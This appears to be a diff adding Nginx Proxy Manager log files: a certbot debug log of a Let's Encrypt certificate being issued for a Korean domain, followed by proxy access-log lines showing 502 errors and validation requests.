2026-02-14 22:37:09,978:DEBUG:acme.client:Storing nonce: QkEzerAfsv9nV3Qq348LLnOxB92Qa-jIqeyURxhV7CClV-KNAmg
|
||||||
|
2026-02-14 22:37:10,978:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:10,983:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnN2OW5WM1FxMzQ4TExuT3hCOTJRYS1qSXFleVVSeGhWN0NDbFYtS05BbWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzU1Nzk0OTc2In0",
|
||||||
|
"signature": "LtmzCt3fpthHfOuEe9PwhlSNbmXHLo8UAzVQ-ymmBpQEBYovhfGYvpBYizq7wKOLelz9oniGzPfAv-taGt7iHnrxs7qjW62KK58QVHItk47Ifdq2KAUjxYKG4yAHoxs_bkmxNngkWadBt4fn31PEQH9e4HTiO2Dh34A13V_o5vsDrugGP9fJ4WuEmewUhyqil2pz7FWqwpwkDJdtpEi_zbEdUVTuCg8UwwZfJPXGRUVWyhQVftmzJkW-RLqDWM--JUAZk4cGFsNecrY9c8WqIi4cG7ifIM-7Kc21ryX_Bvnki-egnCNyV8WSykWdKtzzPuNYkPVKD4euM4y9NNpZ-w",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:11,173:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480355794976 HTTP/1.1" 200 454
|
||||||
|
2026-02-14 22:37:11,174:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 454
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480355794976
|
||||||
|
Replay-Nonce: qLPTsdtftOchIQ67pfn4fKf79QhHr462qCSymeexd-q0zApziWM
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-21T22:37:00Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "www.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c"
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:11,174:DEBUG:acme.client:Storing nonce: qLPTsdtftOchIQ67pfn4fKf79QhHr462qCSymeexd-q0zApziWM
|
||||||
|
2026-02-14 22:37:11,175:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:11,179:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZnRPY2hJUTY3cGZuNGZLZjc5UWhIcjQ2MnFDU3ltZWV4ZC1xMHpBcHppV00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZjMjNhODYzMTkxMzNjMmVhOTRiYWQ2MjMyYjgzZWRjODljIn0",
|
||||||
|
"signature": "QObbXJhGMj8ENq_5FuuPvJ8yHgVPCuys_JsABmNxTiw9xTW36mNVjZiJMWVEGFHVxM6ZGEZlzhWnnp0T3kbdmheU4LYto8C80WL5vp7h2a3ecjkqgeV3COGQ_QhVFbsAJY9rAtQ7CuO72r6VS8Tf1K_AEcbCBJzoqLJU55htt1jPmaEmAhUuKy9QFLcE5fGMtnzbP4nRW_swr-3tmm89-zC5-BJ5TuosNe8iZy6wjsm33i-AEhoIoS9BRfUZhSFxobsQb8pTV4_LYFKHjG1wgrx2XmWy4GWwN6E-NGH6jehlfPU22XBRSSmD4YobWbNHMs61CeO_y-cXUDpZGUlVrQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:11,372:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06c23a86319133c2ea94bad6232b83edc89c HTTP/1.1" 200 2901
|
||||||
|
2026-02-14 22:37:11,373:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:11 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2901
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1>;rel="alternate"
|
||||||
|
Replay-Nonce: qLPTsdtf7TDw9twhO-dJQIwEaE7M6NSgQWEZQc1cW3y0Qsc0R3I
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDrDCCAzGgAwIBAgISBsI6hjGRM8LqlLrWIyuD7cicMAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
ODAeFw0yNjAyMTQyMTM4MzhaFw0yNjA1MTUyMTM4MzdaMB0xGzAZBgNVBAMTEnd3
|
||||||
|
dy5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABPzAMUvKjO5X
|
||||||
|
zitBgqZIxSvhrau1vptwO0tb9gqRkNEMlY4JYC03iBAzJn8/61Q6cSTMPQY5WMd5
|
||||||
|
3KLX2RapvmpZINQkgfLsxpr+MFWTvWDKoKtTWJp9ft2+mryQYeiYD6OCAh0wggIZ
|
||||||
|
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
|
||||||
|
AjAAMB0GA1UdDgQWBBTORiT+dlglG67cimuM1zKD3ELnZTAfBgNVHSMEGDAWgBSP
|
||||||
|
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
|
||||||
|
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISd3d3Lmhhbm1vY25u
|
||||||
|
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
|
||||||
|
dHA6Ly9lOC5jLmxlbmNyLm9yZy8yOS5jcmwwggELBgorBgEEAdZ5AgQCBIH8BIH5
|
||||||
|
APcAdQBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxeTPmgAAAE
|
||||||
|
AwBGMEQCIGxlMBiH9/OnPSvVEujhbNVUSxq/r1Xngcn4TfBZaVGrAiAkIOVzdb/9
|
||||||
|
6AKFMX/ElKQ+7I+hpxNt171wuuDeEjgLkAB+AOMjjfKNoojgquCs8PqQyYXwtr/1
|
||||||
|
0qUnsAH8HERYxLboAAABnF5M/BQACAAABQAymAnXBAMARzBFAiEArvxAvG9uE2Tu
|
||||||
|
DDEeVhOZqlCxIN4TPjui3hiU+mrKZjkCIDizPzKN4wLVM22r8q+oVeOTtAsRHvGX
|
||||||
|
fwG9AX9le6neMAoGCCqGSM49BAMDA2kAMGYCMQCMzvyXShGR+CTivx802AAWc6AY
|
||||||
|
gthWXK7x71B1cXqasqwYOiDM+YUFwYHALE+u+iwCMQDMXxRf8NuIx6cPsKSX6vOc
|
||||||
|
O0tAcvgdvPwBxoXi5cg4Qa96OiXsH8KioJwDWPbj6xs=
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP
|
||||||
|
MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy
|
||||||
|
Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa
|
||||||
|
Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF
|
||||||
|
bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c
|
||||||
|
S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb
|
||||||
|
R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB
|
||||||
|
9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
|
||||||
|
MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j
|
||||||
|
cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB
|
||||||
|
BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE
|
||||||
|
DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j
|
||||||
|
ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0
|
||||||
|
RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d
|
||||||
|
AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8
|
||||||
|
otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA
|
||||||
|
aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm
|
||||||
|
Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2
|
||||||
|
HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1
|
||||||
|
Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR
|
||||||
|
xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d
|
||||||
|
tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/
|
||||||
|
jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS
|
||||||
|
u1igv3OefnWjSQ==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-14 22:37:11,373:DEBUG:acme.client:Storing nonce: qLPTsdtf7TDw9twhO-dJQIwEaE7M6NSgQWEZQc1cW3y0Qsc0R3I
|
||||||
|
2026-02-14 22:37:11,374:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 22:37:11,378:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjdURHc5dHdoTy1kSlFJd0VhRTdNNk5TZ1FXRVpRYzFjVzN5MFFzYzBSM0kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZjMjNhODYzMTkxMzNjMmVhOTRiYWQ2MjMyYjgzZWRjODljLzEifQ",
|
||||||
|
"signature": "uu2PvwRtaxBS1QWdF_MOhZwLzyiYka_x_4ps9bxP_QS3xI9IR7VtV0_neoEBGCLqFCVL3iIIUmsCDLtsXc_u9p_s39ENtIL24UiY_UrmgLvj_HFe8sBxap-xz52WXT_9NYOkaP26eyEsH-17HGQzgEkEJ1DYSqiGEhDKx8nEaOPIKFXvNhxL7nDCgFl2Klcby9cuYQlvnLulhsfKjFPYDc0tB8kx4fxwZ6wQjZ7l3zTP3AicvsUc2AP_4e13k3lkieQtwUebu8Tiv6NvOnQMMBSQwywDa09tXJpyDDWMDbjvAgATPSA1HR4NL3AY4ADE8qRG9zyGx4VTH4pQS9xS7A",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 22:37:11,555:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1 HTTP/1.1" 200 2336
|
||||||
|
2026-02-14 22:37:11,555:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 22:37:11 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2336
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/0>;rel="alternate"
|
||||||
|
Replay-Nonce: qLPTsdtfwihD2UbAkXWUlDlC5JvHa190X7NLtkceYR52txIHYoY
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDrDCCAzGgAwIBAgISBsI6hjGRM8LqlLrWIyuD7cicMAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
ODAeFw0yNjAyMTQyMTM4MzhaFw0yNjA1MTUyMTM4MzdaMB0xGzAZBgNVBAMTEnd3
|
||||||
|
dy5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABPzAMUvKjO5X
|
||||||
|
zitBgqZIxSvhrau1vptwO0tb9gqRkNEMlY4JYC03iBAzJn8/61Q6cSTMPQY5WMd5
|
||||||
|
3KLX2RapvmpZINQkgfLsxpr+MFWTvWDKoKtTWJp9ft2+mryQYeiYD6OCAh0wggIZ
|
||||||
|
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
|
||||||
|
AjAAMB0GA1UdDgQWBBTORiT+dlglG67cimuM1zKD3ELnZTAfBgNVHSMEGDAWgBSP
|
||||||
|
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
|
||||||
|
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISd3d3Lmhhbm1vY25u
|
||||||
|
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
|
||||||
|
dHA6Ly9lOC5jLmxlbmNyLm9yZy8yOS5jcmwwggELBgorBgEEAdZ5AgQCBIH8BIH5
|
||||||
|
APcAdQBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxeTPmgAAAE
|
||||||
|
AwBGMEQCIGxlMBiH9/OnPSvVEujhbNVUSxq/r1Xngcn4TfBZaVGrAiAkIOVzdb/9
|
||||||
|
6AKFMX/ElKQ+7I+hpxNt171wuuDeEjgLkAB+AOMjjfKNoojgquCs8PqQyYXwtr/1
|
||||||
|
0qUnsAH8HERYxLboAAABnF5M/BQACAAABQAymAnXBAMARzBFAiEArvxAvG9uE2Tu
|
||||||
|
DDEeVhOZqlCxIN4TPjui3hiU+mrKZjkCIDizPzKN4wLVM22r8q+oVeOTtAsRHvGX
|
||||||
|
fwG9AX9le6neMAoGCCqGSM49BAMDA2kAMGYCMQCMzvyXShGR+CTivx802AAWc6AY
|
||||||
|
gthWXK7x71B1cXqasqwYOiDM+YUFwYHALE+u+iwCMQDMXxRf8NuIx6cPsKSX6vOc
|
||||||
|
O0tAcvgdvPwBxoXi5cg4Qa96OiXsH8KioJwDWPbj6xs=
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw
|
||||||
|
CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg
|
||||||
|
R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y
|
||||||
|
NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy
|
||||||
|
eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM
|
||||||
|
ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET
|
||||||
|
oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO
|
||||||
|
BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG
|
||||||
|
A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK
|
||||||
|
MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw
|
||||||
|
JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK
|
||||||
|
MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v
|
||||||
|
cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls
|
||||||
|
5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4
|
||||||
|
4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-14 22:37:11,555:DEBUG:acme.client:Storing nonce: qLPTsdtfwihD2UbAkXWUlDlC5JvHa190X7NLtkceYR52txIHYoY
|
||||||
|
2026-02-14 22:37:11,572:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
|
||||||
|
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive.
|
||||||
|
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live.
|
||||||
|
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/README.
|
||||||
|
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-1.
|
||||||
|
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-1.
|
||||||
|
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-1/cert.pem.
|
||||||
|
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-1/privkey.pem.
|
||||||
|
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-1/chain.pem.
|
||||||
|
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-1/fullchain.pem.
|
||||||
|
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-1/README.
|
||||||
|
2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
|
||||||
|
2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
|
||||||
|
2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
|
||||||
|
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var webroot_map={'www.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
|
||||||
|
2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Successfully received certificate.
|
||||||
|
Certificate is saved at: /etc/letsencrypt/live/npm-1/fullchain.pem
|
||||||
|
Key is saved at: /etc/letsencrypt/live/npm-1/privkey.pem
|
||||||
|
This certificate expires on 2026-05-15.
|
||||||
|
These files will be updated when the certificate renews.
|
||||||
|
2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
|
||||||
|
2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
|
||||||
|
2026-02-14 22:37:11,592:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
|
||||||
|
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
|
||||||
|
* Donating to EFF: https://eff.org/donate-le
|
||||||
0
npm/data/logs/letsencrypt.log.7
Normal file
0
npm/data/logs/letsencrypt.log.7
Normal file
152
npm/data/logs/proxy-host-1_access.log
Normal file
152
npm/data/logs/proxy-host-1_access.log
Normal file
@@ -0,0 +1,152 @@
|
|||||||
|
[14/Feb/2026:22:37:21 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:37:21 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:40:05 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:41:28 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:43:06 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:22:50:21 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:50:21 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:50:32 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:50:32 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:51:08 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:51:08 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:53:09 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:53:09 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:53:23 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
